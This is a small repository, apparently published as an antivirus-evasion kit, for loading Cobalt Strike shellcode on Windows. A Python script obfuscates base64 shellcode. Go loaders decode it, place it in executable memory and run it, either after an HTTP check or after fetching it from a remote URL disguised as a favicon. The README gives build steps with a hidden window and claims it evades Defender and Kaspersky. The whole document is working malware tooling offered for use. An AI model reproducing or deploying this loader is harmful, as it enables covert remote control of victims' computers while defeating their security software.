├── go_shellcode_encode.py
├── main.go
└── README.md
/go_shellcode_encode.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import random
3 | import numpy
4 |
5 |
6 | buf1 = b"shellcode"
7 | b64shellcode = base64.b64encode(buf1).decode()
8 | b64shellcode = b64shellcode.replace("A","#").replace("H","!").replace("1","@").replace("T",")")
9 | print(b64shellcode)
10 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "encoding/base64"
5 | "strings"
6 | "syscall"
7 | "unsafe"
8 | "net/http"
9 | "net/url"
10 | )
11 | var (
12 | kernel32 = syscall.NewLazyDLL("kernel32.dll")
13 | VirtualAlloc = kernel32.NewProc("VirtualAlloc")
14 | RtlMoveMemory = kernel32.NewProc("RtlMoveMemory")
15 | )
16 |
17 | func build(ddm string){
18 | str1 :=strings.Replace(ddm, "#", "A", -1 )
19 | str2 :=strings.Replace(str1, "!", "H", -1 )
20 | str3 :=strings.Replace(str2, "@", "1", -1 )
21 | str4 :=strings.Replace(str3, ")", "T", -1 )
22 | sDec,_ := base64.StdEncoding.DecodeString(str4)
23 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40)
24 | _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec)))
25 | syscall.Syscall(addr, 0, 0, 0, 0)
26 |
27 | }
28 | func main() {
29 | u, _ := url.Parse("http://192.168.150.131")
30 | q := u.Query()
31 | u.RawQuery = q.Encode()
32 | res, err := http.Get(u.String())
33 | if err != nil {
34 | return
35 | }
36 | resCode := res.StatusCode
37 | res.Body.Close()
38 | if err != nil {
39 | return
40 | }
41 | var y int = 200
42 | if resCode == y {
43 | build("payload")
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 0x00 generate cobaltstrike shellcode
2 |
3 | `Attacks =>> Packages =>> Payload generate =>> Output =>> Raw =>> payload.bin`
4 |
5 | # 0x01 replace base64 shellcode
6 |
7 | `python go-shellcode.py payload.bin`
8 |
9 | ```
10 | import base64
11 | import random
12 | import numpy
13 | import sys
14 |
15 | # print len(sys.argv)
16 | # print sys.argv[0]
17 | # print sys.argv[1]
18 |
19 | if len(sys.argv) != 2:
20 | sys.exit("[+] useage: python %s [File: payload.bin]"%sys.argv[0])
21 | else:
22 | shellcode = open("payload.bin","rb").read()
23 | b64shellcode = base64.b64encode(shellcode).decode()
24 | b64shellcode = b64shellcode.replace("A","#").replace("H","!").replace("1","@").replace("T",")")
25 | print("[+] b64shellcode= \n" + b64shellcode)
26 | f = open("favicon.txt","wb")
27 | f.write(b64shellcode)
28 | f.close()
29 | ```
30 |
31 | # 0x02 comiple mian.go
32 |
33 | **`go build -ldflags="-w -s -H=windowsgui" shell.go`**
34 |
35 |
36 | ```
37 | package main
38 |
39 |
40 | import (
41 | "encoding/base64"
42 | "fmt"
43 | "io/ioutil"
44 | "net/http"
45 | "os"
46 | "strings"
47 | "syscall"
48 | "unsafe"
49 | "flag"
50 | )
51 | var (
52 | kernel32 = syscall.NewLazyDLL("kernel32.dll")
53 | VirtualAlloc = kernel32.NewProc("VirtualAlloc")
54 | RtlMoveMemory = kernel32.NewProc("RtlMoveMemory")
55 | )
56 | func runUrl(url string) {
57 | resp, _ := http.Get(url)
58 | body, _ := ioutil.ReadAll(resp.Body)
59 | resp.Body.Close()
60 |
61 |
62 | str1 :=strings.Replace(string(body), "#", "A", -1 )
63 | str2 :=strings.Replace(str1, "!", "H", -1 )
64 | str3 :=strings.Replace(str2, "@", "1", -1 )
65 | str4 :=strings.Replace(str3, ")", "T", -1 )
66 | sDec,_ := base64.StdEncoding.DecodeString(str4)
67 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40)
68 | _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec)))
69 | syscall.Syscall(addr, 0, 0, 0, 0)
70 | }
71 |
72 |
73 | func ReadFile(filepath string){
74 | f, err := os.Open(filepath)
75 | if err != nil {
76 | fmt.Println("read file fail", err)
77 | }
78 | defer f.Close()
79 |
80 | fd, err := ioutil.ReadAll(f)
81 | if err != nil {
82 | fmt.Println("read to fd fail", err)
83 | }
84 |
85 | str1 :=strings.Replace(string(fd), "#", "A", -1 )
86 | str2 :=strings.Replace(str1, "!", "H", -1 )
87 | str3 :=strings.Replace(str2, "@", "1", -1 )
88 | str4 :=strings.Replace(str3, ")", "T", -1 )
89 |
90 | sDec,_ := base64.StdEncoding.DecodeString(str4) //base64解密
91 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40)
92 | _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec)))
93 | syscall.Syscall(addr, 0, 0, 0, 0)
94 | }
95 |
96 | func main() {
97 |
98 | var url string
99 | var code string
100 |
101 | flag.StringVar(&url, "u", "", "url")
102 | flag.StringVar(&code, "s", "", "shellcode")
103 | flag.Parse()
104 |
105 | if(len(os.Args) != 3){
106 | // fmt.Println("Usage:xxx.exe -u http://x.x.x.x/code.txt")
107 | // fmt.Println("Or xxx.exe -s base64_encode_shellcode")
108 | os.Exit(0)
109 | } else if url != "" {
110 | runUrl(url)
111 | }else{
112 | ReadFile(code)
113 | }
114 | }
115 |
116 | ```
117 |
118 | # 0x03 get session
119 |
120 | **shell.exe -u http://172.16.242.1/favicon.ico**
121 |
122 | **shell.exe -s payload.txt**
123 |
124 | # bypassAV
125 | 条件触发式远控 VT 6/70 免杀国内杀软及defender、卡巴斯基等主流杀软
126 | ## 原理
127 | https://pureqh.top/?p=5412
128 | ## use
129 | 将shellcode填至go_shellcode_encode.py生成混淆后的base64 payload
130 | 然后将生成的payload填至main.go build("b64shellcode")
131 | 将main.go中的url替换为你vbs的某个网页或文本(局域网网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)
132 | 编译:go build -ldflags="-w -s -H=windowsgui"
133 |
--------------------------------------------------------------------------------